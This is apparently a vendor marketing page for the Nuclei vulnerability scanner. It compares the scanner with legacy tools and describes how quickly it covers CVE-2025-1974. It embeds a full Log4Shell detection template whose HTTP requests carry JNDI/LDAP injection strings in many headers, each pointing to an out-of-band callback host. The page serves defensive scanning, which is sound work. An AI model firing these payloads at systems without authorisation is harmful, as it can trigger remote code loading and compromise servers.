Effective vulnerability management starts with a better scanner
Nuclei detects exploitable vulnerabilities across every asset, so you can fix what matters without the noise.

Trusted by 100k+ security professionals
How ProjectDiscovery solves vulnerability management
Real, actionable findings that an attacker could exploit
Streamlined prioritization without false positives
Broadest coverage for all security risks, not just CVEs
Accelerated remediation with automated ticketing
- Fewer vulnerabilities from false positives
- 97%
- Manual triage time saved per incident
- 24 hours
- Detection templates for real security risks
- 11,000+
- Faster exploit coverage than traditional scanners
- 10x
Nuclei validates exploitability at runtime
Traditional vulnerability scanners like Tenable, Qualys, and Rapid7 rely on outdated techniques like version fingerprinting and static signatures. These rigid, black-box tools overwhelm teams with false positives and blind spots.
Direct behavioral checks
Support for complex request flows including value extraction and reuse, pipelining, request tampering, race conditions, and raw request crafting—enabling real-world attack simulation at scale.
Smart validation logic
Use flexible matchers to validate responses with precision—status codes, regex patterns, binary data, XPath, and more. Matchers are the core of Nuclei’s signal-over-noise approach to vulnerability detection.
Multi-protocol support
Nuclei goes beyond traditional web scanning, with support for DNS, TCP, headless browsers, and more. Templates can be run with or without authentication to test real-world attack paths anywhere in your environment.
1id: CVE-2021-4422823info:4 name: Apache Log4j2 Remote Code Injection5 author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo6 severity: critical7 description: |8 Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.9 An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.10 impact: |11 Successful exploitation of this vulnerability can lead to remote code execution, potentially compromising the affected system.12 remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).13 reference:14 - https://logging.apache.org/log4j/2.x/security.html15 - https://nvd.nist.gov/vuln/detail/CVE-2021-4422816 - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q17 - https://www.lunasec.io/docs/blog/log4j-zero-day/18 - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a19 classification:20 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H21 cvss-score: 1022 cve-id: CVE-2021-4422823 cwe-id: CWE-20,CWE-91724 epss-score: 0.9438125 epss-percentile: 0.9995926 cpe: cpe:2.3:o:siemens:6bk1602-0aa12-0tp0_firmware:*:*:*:*:*:*:*:*27 metadata:28 max-request: 229 vendor: siemens30 product: 6bk1602-0aa12-0tp0_firmware31 tags: cve2021,cve,rce,oast,log4j,injection,kev,apache32variables:33 rand1: '{{rand_int(111, 999)}}'34 rand2: '{{rand_int(111, 999)}}'35http:36 - raw:37 - |38 GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.139 Host: {{Hostname}}40 - |41 GET / HTTP/1.142 Host: {{Hostname}}43 Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}44 Accept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}45 Accept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}46 Access-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}47 Access-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}48 Authentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}49 Authentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}50 Cookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}51 Location: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}52 Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}53 Referer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}54 Upgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}55 User-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}56 X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}57 X-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}58 X-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}59 X-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}60 X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}61 stop-at-first-match: true62 matchers-condition: and63 matchers:64 - type: word65 part: interactsh_protocol66 words:67 - "dns"68 - type: regex69 part: interactsh_request70 regex:71 - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'72 extractors:73 - type: kval74 kval:75 - type: regex76 group: 277 regex:78 - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'79 part: interactsh_request80 - type: regex81 group: 182 regex:83 - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'84 part: interactsh_request85 # digest: 4a0a0047304502202884fb76d02d44ae24b3e9bc5914a20e89726f929f3a1472cb9ce81e16f6c7320221009fb4e79fd5e58f4a49ccbeff467c990c3be6e32a7e03a2af8db207849e937d5f:922c64590222798bb761d5b6d8e7295086# digest: 4a0a0047304502204ecff69d0cf6eff10fa830187e3bb11859e75c1901f1be914ec81bc02e7a9d8b02210097c7eec83c3c4e92ced242dcf77aeba969817fd0c9306fbc099450473f23d99a:922c64590222798bb761d5b6d8e72950
Nuclei templates are designed to run safely at scale. Each template is individually tested and reviewed by our team.
Faster detection. Faster protection.
ProjectDiscovery responds to critical vulnerabilities faster than legacy scanners.
CVE-2025-1974
IngressNightmare
A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
Time to detection
ProjectDiscovery
Legacy scanners
Public advisory & patch release
Kubernetes and Wiz Research publicly disclosed CVE-2025-1974 and released patched Ingress NGINX versions 1.12.1 and 1.11.5.
ProjectDiscovery publishes internal detection template
A Nuclei template for internal network scanning of CVE-2025-1974 was released, enabling detection within private infrastructures.
Realtime automated scans triggered
Remediation workflows initiated
Qualys publishes upgrade advisory
Qualys released a blog post recommending users upgrade their Ingress NGINX controller to the patched versions to mitigate CVE-2025-1974.
ProjectDiscovery publishes external detection template
A Nuclei template for external scanning was released, allowing detection of CVE-2025-1974 from outside target networks.
External scanning available
Rapid7 releases Cluster Scanner plugin
Rapid7 launched the Kubernetes Cluster Scanner plugin with checks for CVE-2025-1974, enabling customers to validate patch status across their clusters.
Tenable releases Nessus plugin #233656
Tenable published a direct remote check plugin for Nessus, allowing automated scanning for CVE-2025-1974 on target systems.
- Scan for CVE-2025-1974
The vulnerability management lifecycle, reimagined
We're rethinking every step of the vulnerability management lifecycle to help teams detect more actionable findings and fix what actually matters.
Scope
Discover everything
We combine external recon and internal network discovery to build a complete, unified asset inventory
Scan
Detect real exploits
Nuclei validates exploitability at runtime to provide real, actionable results
Prioritize
Focus on what matters
Prioritize high-impact findings based on asset context like ownership, criticality, and exposure
Remediate
Fix risks faster
Create Jira tickets with a single click and validate fixes with instant retest
Monitor
Ensure vulnerabilities stay fixed
Automated regressions and continuous monitoring to ensure risks don't re-appear
ProjectDiscovery vs Traditional scanners
See how our modern approach to vulnerability management outperforms traditional solutions
Feature
ProjectDiscovery
Traditional (Tenable, Qualys, Rapid7)
Detection accuracy
Detects real, exploitable vulnerabilities(ProjectDiscovery)
Direct behavioral checks validate exploitability at runtime to eliminate false positives.
Noise and false positives(Traditional VM)
Version-based checks create alert fatigue and waste triage time.
Detection coverage
Broadest coverage for real security risks(ProjectDiscovery)
Over 11,000 detection templates covering the most exploited vulnerabilities on the internet.
CVE-based detections only(Traditional VM)
Detections only for known CVEs, which misses critical misconfigurations and other actively exploited security risks.
Time to detection
Real-time intelligence(ProjectDiscovery)
Rapid detection response from a global security community and ProjectDiscovery’s research team.
Delayed and opaque(Traditional VM)
Relies on commercial vendor updates that are slow and inaccurate.
Risk prioritization
Context-aware scoring(ProjectDiscovery)
Exploitability + asset context drastically reduce triage time.
Static severity scores(Traditional VM)
Relies on CVSS without real-world context or validation.
Customization
Adaptable and extensible templates(ProjectDiscovery)
Customize and write your own detection templates.
Rigid and black box(Traditional VM)
Limited to vendor-defined scanning capabilities without modification.
Target scope
Automated discovery with cloud integrations(ProjectDiscovery)
External and internal recon plus cloud integrations offer broadest coverage.
Bring your own assets(Traditional VM)
Lacks robust discovery capabilities, creating gaps in scope and coverage.
Real-time asset visibility kept their perimeter audit-ready
Scanned 14,500 assets in under 5 minutes during a critical CVE
Validated fixes instantly with one-click retests
Cut response noise by escalating only when necessary
Turned bug bounty findings into reusable detections
Featured stories
The latest in open source tools, recent exploits, Nuclei templates, and more.